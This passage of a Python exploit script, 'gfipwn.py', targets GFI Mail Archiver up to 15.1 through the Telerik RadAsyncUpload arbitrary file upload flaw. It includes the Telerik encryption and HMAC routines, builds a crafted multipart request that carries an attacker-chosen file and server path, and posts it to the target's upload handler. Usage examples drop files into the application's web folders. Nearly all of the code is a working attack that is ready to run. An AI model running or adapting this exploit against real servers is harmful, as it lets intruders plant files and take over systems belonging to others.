        """Invert encrypt(): base64-decode, AES-CBC decrypt, strip PKCS#7
        padding (length read from the last byte), UTF-8 decode and keep
        every second character, dropping the NULs encrypt() interleaved.

        No integrity check is performed here and the unpad lambda trusts
        the final byte, so malformed input may raise or return garbage.
        """
        sys.stderr.write("Decrypting... ")
        ciphertext = base64.b64decode(ciphertext)
        cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
        unpad = lambda s: s[0:-ord(chr(s[-1]))]
        sys.stderr.write("done\n")
        return unpad(cipher.decrypt(ciphertext)).decode()[0::2]


    def addHmac(string, Version):
        """Append base64(HMAC-SHA256(HASHKEY, string)) when *Version* starts
        with a year of 2017 or later; otherwise return *string* unchanged.

        int(Version[:4]) assumes a four-digit leading year. The HMAC is
        computed in every case and simply discarded for older versions.
        """

        isHmacVersion = False

        # "Encrypt-then-MAC" feature introduced in R1 2017
        # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.)

        if int(Version[:4]) >= 2017:
            isHmacVersion = True

        hmac = HMAC.new(
            bytes(RAUCipher.HASHKEY.encode()),
            string.encode(),
            SHA256.new()
            )

        hmac = base64.b64encode(hmac.digest()).decode()
        return string + hmac if isHmacVersion else string


def getProxy(proxy):
    """Build a requests-style proxies mapping.

    Args:
        proxy: proxy URL, or a falsy value (False/None) meaning no proxy.
            The same value is applied to both schemes.

    Returns:
        dict with "http" and "https" both mapped to *proxy*.
    """
    return dict.fromkeys(("http", "https"), proxy)


def rauPostData_enc(partA, partB):
    """Return the multipart `rauPostData` part: encrypt(partA) + "&" + encrypt(partB).

    Args:
        partA: JSON configuration string (see rauPostData_prep()).
        partB: assembly-qualified type name string.

    The part delimiter is "--" + the fixed boundary that upload() puts in
    the Content-Type header. Note the part is not terminated here; the
    caller appends the next boundary line.
    """
    data = "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
    data += "\r\n"
    data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n"
    return  data


def rauPostData_prep(TempTargetFolder, Version):
    """Build the encrypted rauPostData multipart part for a given folder and version.

    Args:
        TempTargetFolder: server-side folder string to embed (encrypted, then
            HMAC'd for 2017+ versions by RAUCipher.addHmac()).
        Version: Telerik.Web.UI version string; drives both the HMAC
            decision and the type name in partB.

    Returns:
        The multipart part string produced by rauPostData_enc().

    partA is the AsyncUploadConfiguration JSON with an empty encrypted
    TargetFolder, the encrypted TempTargetFolder, MaxFileSize 0 and a
    40-hour TimeToLive; partB is the assembly-qualified type name for
    Telerik.Web.UI.AsyncUploadConfiguration.
    """
    TargetFolder = RAUCipher.addHmac(
                                RAUCipher.encrypt(""),
                                Version
                                )
    TempTargetFolder = RAUCipher.addHmac(
                                RAUCipher.encrypt(TempTargetFolder),
                                Version
                                )

    partA = \
        '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
        TempTargetFolder + \
        '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}'

    partB = \
        "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \
        Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4"
    
    return rauPostData_enc(partA, partB)


def payload(TempTargetFolder, Version, payload_filename):
    """Assemble the full multipart/form-data body for the RadAsyncUpload handler.

    Args:
        TempTargetFolder: destination folder string embedded via rauPostData_prep().
        Version: Telerik.Web.UI version string.
        payload_filename: local path of the file whose bytes form the `file` part.

    Returns:
        The body as a str. Progress messages go to stderr.

    The parts, in order: rauPostData, file (content-type
    application/octet-stream, filename "blob"), fileName, contentType,
    lastModifiedDate and a metadata JSON whose UploadID is the local file's
    basename — presumably what the server uses for the stored name
    (confirm). The file is opened without a context manager, so an
    exception in read() would leave the handle to the garbage collector.
    """
    sys.stderr.write("Local file path: " + payload_filename + "\n")
    payload_filebasename = os.path.basename(payload_filename)
    sys.stderr.write("Destination file name: " + payload_filebasename + "\n")
    sys.stderr.write("Destination path: " + TempTargetFolder + "\n")
    sys.stderr.write("Version: " + Version + "\n")
    sys.stderr.write("Preparing payload... \n")
    payload_file = open(payload_filename, "rb")
    payload_file_data = payload_file.read()
    payload_file.close()

    data = rauPostData_prep(TempTargetFolder, Version)
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n"
    data += "Content-Type: application/octet-stream\r\n"
    data += "\r\n"
    # raw_unicode_escape maps each byte to one code point so binary content can
    # be spliced into this str body; it is re-encoded by the HTTP layer.
    data += payload_file_data.decode("raw_unicode_escape") + "\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"fileName\"\r\n"
    data += "\r\n"
    data += "RAU_crypto.bypass\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"contentType\"\r\n"
    data += "\r\n"
    data += "text/html\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n"
    data += "\r\n"
    data += "2019-01-02T03:04:05.067Z\r\n"
    data += "-----------------------------62616f37756f2f\r\n"
    data += "Content-Disposition: form-data; name=\"metadata\"\r\n"
    data += "\r\n"
    data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \
            payload_filebasename + "\"}\r\n"
    # Closing boundary ("--" suffix) ends the multipart body.
    data += "-----------------------------62616f37756f2f--\r\n"
    data += "\r\n"
    sys.stderr.write("Payload prep done\n")
    return data


def upload(data, url, proxy = False):
    """POST a prebuilt multipart body to *url* and return the response text.

    Args:
        data: body string from payload().
        url: full handler URL (built by mode_Post()).
        proxy: proxy URL or False; expanded by getProxy() for both schemes.

    Returns:
        response.text of the single request; no status-code check is made.

    The Content-Type boundary here is the one the body parts use (each part
    delimiter is "--" + boundary). TLS verification follows the module
    constant CERT_VERIFY (False by default).
    """

    # Only read here, so the global statement is not strictly required.
    global CERT_VERIFY

    sys.stderr.write("Preparing to send request to " + url + "\n")
    session = requests.Session()
    request = requests.Request(
                        "POST",
                        url,
                        data=data
                        )
    request = request.prepare()
    request.headers["Content-Type"] = \
        "multipart/form-data; " +\
        "boundary=---------------------------62616f37756f2f"
    response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy))
    sys.stderr.write("Request done\n")
    return response.text


def decode_rauPostData(rauPostData):
    """Decrypt a captured rauPostData value into a human-readable summary.

    Args:
        rauPostData: the "<encJSON>&<encVersion>" string as sent by a client.

    Returns:
        A multi-line string with the configuration JSON, the decrypted
        TempTargetFolder and the version string.

    Useful for analysts reviewing upload traffic: it shows which folder a
    request asked the handler to write into. Requires exactly the two
    '&'-separated fields (IndexError otherwise) and a valid JSON first
    field; any HMAC suffix is not stripped before decryption.
    """
    rauPostData = rauPostData.split("&")
    rauJSON = RAUCipher.decrypt(rauPostData[0])
    decoded = "\nJSON: " + rauJSON + "\n"
    TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"]
    decoded = decoded + "\nTempTargetFolder = " + \
                        RAUCipher.decrypt(TempTargetFolder) + "\n"
    rauVersion = RAUCipher.decrypt(rauPostData[1])
    decoded = decoded + "\nVersion: " + rauVersion + "\n"
    return decoded


def mode_decrypt():
    """Decrypt the ciphertext given as sys.argv[2] and print it.

    Retained from the original RAU_crypto tool; the dispatcher at the
    bottom of this file only invokes mode_Post() and mode_help(), so this
    mode is not reachable from the command line here.
    """
    # decrypt ciphertext
    ciphertext = sys.argv[2]
    print("\n" + RAUCipher.decrypt(ciphertext) + "\n")


def mode_Decrypt_rauPostData():
    """Decode the rauPostData string given as sys.argv[2] via decode_rauPostData().

    Not reachable from this file's dispatcher, which only calls mode_Post()
    and mode_help().
    """
    # decrypt rauPostData
    rauPostData = sys.argv[2]
    print(decode_rauPostData(rauPostData))


def mode_encrypt():
    """Encrypt the plaintext given as sys.argv[2] and print the base64 result.

    Not reachable from this file's dispatcher, which only calls mode_Post()
    and mode_help().
    """
    # encrypt plaintext
    plaintext = sys.argv[2]
    print("\n" + RAUCipher.encrypt(plaintext) + "\n")


def mode_Encrypt_rauPostData():
    """Print the rauPostData part for sys.argv[2] (folder) and sys.argv[3] (version).

    Not reachable from this file's dispatcher, which only calls mode_Post()
    and mode_help().
    """
    # encrypt rauPostData based on TempTargetFolder and Version
    TempTargetFolder = sys.argv[2]
    Version = sys.argv[3]
    print(
        "rauPostData: " +
        rauPostData_prep(TempTargetFolder, Version) +
        "\n"
    )


def mode_payload():
    """Print the Content-Type header and multipart body without sending it.

    Reads the folder from sys.argv[2] and the file from sys.argv[4] — the
    original RAU_crypto argument layout, not the -u/-f/-p layout this
    script's usage text describes. The version is fixed at "2013.1.417.40"
    (a pre-2017 version, so no HMAC is appended). Not reachable from this
    file's dispatcher.
    """
    # generate a payload based on TempTargetFolder, Version and payload file
    TempTargetFolder = sys.argv[2]
    Version = "2013.1.417.40"
    payload_filename = sys.argv[4]
    print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f")
    print(payload(TempTargetFolder, Version, payload_filename))


def mode_Post(proxy = False):
    """Build and send the upload for the `-u URL -f FILE -p PATH` invocation.

    Args:
        proxy: proxy URL or False (the dispatcher always uses the default).

    Positional layout is fixed: sys.argv[2] is the base URL (the handler
    path "/Telerik.Web.UI.WebResource.axd?type=rau" is appended),
    sys.argv[4] the local file and sys.argv[6] the destination folder; the
    flag names themselves are not checked beyond argv[1] == "-u" in the
    dispatcher. Version is fixed at "2013.1.417.40". Prints the raw
    response text, then a reminder line.
    """
    # generate and upload a payload based on
    # TempTargetFolder, Version, payload file and url
    Version = "2013.1.417.40"
    url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau"
    payload_filename = sys.argv[4]
    TempTargetFolder = sys.argv[6]

    print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy))
    print("\n[+] Check your uploaded file\n");


def mode_help():
    """Print command-line usage with two example invocations to stdout."""
    usage_lines = [
        "Usage: ",
        "Example1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' ",
        "Example2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'",
    ]
    print("\n".join(usage_lines))


# Banner goes to stderr so stdout carries only the mode output.
sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n")
sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n")

# Dispatcher: only the `-u URL -f FILE -p PATH` form (exactly 7 argv entries,
# argv[1] == "-u") runs mode_Post(); anything else prints usage. The other
# mode_* functions above are not wired in here.
if len(sys.argv) < 2:
    mode_help()
elif sys.argv[1] == "-u" and len(sys.argv) == 7:
    mode_Post()
else:
    mode_help()